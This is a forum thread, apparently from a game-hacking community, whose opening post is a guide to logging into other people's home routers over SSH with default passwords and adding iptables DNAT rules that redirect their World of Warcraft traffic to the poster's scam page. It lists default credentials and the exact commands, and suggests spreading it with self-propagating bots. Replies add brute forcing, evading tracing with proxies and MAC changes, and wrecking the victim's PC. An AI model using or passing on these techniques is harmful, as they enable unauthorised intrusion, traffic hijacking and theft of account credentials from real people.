Awesome. Nothing else to describe. Will give rep if I can pull it off
Little complicated for inexperienced....hackers...might want to add pictures.
The threads about changing hosts files on windows remembered me of something. And if youre not feeling very lucky dont even bother reading this.
You all know what is router probbaly, many people after they bought one and set it up dont change the default password. If you know someone who have one with BusyBox installed (like D-Link ones) and he plays wow, you can get lucky.
All you have to do is to get his IP. You can do this in so many many ways. (If people gets interested i can make some guides).
Ok, when you get his IP, go and download some SSH client (like PuTTY Download Page ). Then try and connect to your friends IP using ssh on port 22. If youre lucky enough you will get connected. It will ask you for username and password, the most common defaults are:
So if you get in you will see something like:Code:admin:admin root:admin user:user D-Link:D-Link
What you want to do now is to set on router when he will try to access his wow site, he will get fowarded to your scam page. You can do this with this command:Code:BusyBox v0.61.pre (2006.11.22-06:38+0000) Built-in shell (ash) Enter 'help' for a list of built-in commands.
Note: 12.129.242.22 is the ip of World of Warcraft: Wrath of the Lich King && You need to have your scampage in your root directory (ala, no free web space providers)Code:iptables -t nat -A PREROUTING -p tcp -d 12.129.242.22 --dport 80 -j DNAT --to-destination IP_OF_YOUR_SCAM_PAGE;iptables -t nat -A POSTROUTING -p tcp -o eth0 -j SNAT --to-source 12.129.242.22
So as i said on beggining dont even do this if youre not feeling lucky. This will probbaly be useless to most of people. But if you know what are bots, zombies, kaitens... This could be very usefull to you. There is that bot called Hydra that spreds itself to random IPs... You can even write your own bot to spread like this and fowarding all to yours scam page when they visit wow offical site.
Awesome. Nothing else to describe. Will give rep if I can pull it off
Little complicated for inexperienced....hackers...might want to add pictures.
+Rep, cool
omg, ok so the chance that you're gonna get into someones router like this is so unlikely but that command is friggin awesome, didn't know about that thanks, is it the same command on CISCO routers etc.?
+rep (I never give it so feel lucky)
https://www.mmowned.com/forums/world-of-warcraft/guides/278302-selecting-bot-you.html - SELECTING THE BOT FOR YOU
PHWOOOOAAAAAR - Parog was here. <3 <----Wtf's a Parog?
I cant made it, but good guide
Ok listen up retards...unless you know what your doing 110% I wouldn't even attempt this. It is more or less hacking and while very effective and fun, it is in no way easy ( or everyone would be doing it ). I can assure you this will cause you trouble unless you know exactly what you are doing....that prick is just REP HUNGRY and doesn't care what happens you , just once retards give him rep he's fine.....no rep cookies for you -.-
I know i that i haven't been here for eternity, but ill spread some info on this.
Usual PW's and ID's on Routers:
ID: Root
PW: Root
ID: admin
PW: admin
ID:
PW: admin
ID: user
PW: user
ID:
PW:
(Yes sometimes it's not even protected, but in rare occasions)
If you can't figure it out try using brute force to get the password (yes it may take shitloads of time).
I would recommend hiding your IP by using proxies or any other thing you can think out. Changing MAC is a good idea too.
You can also allow remote desktop connection to your IP (risky), and run The Flasher to completely kill your victim's PC. Or you can use it for your own good.
There are just too MANY ways of getting IP's you can just google them for tut's as OP has already said. You can use Netstat -N, tracert, even ping and that's just CMD.
Last edited by kangaxx4; 01-05-2009 at 12:26 PM.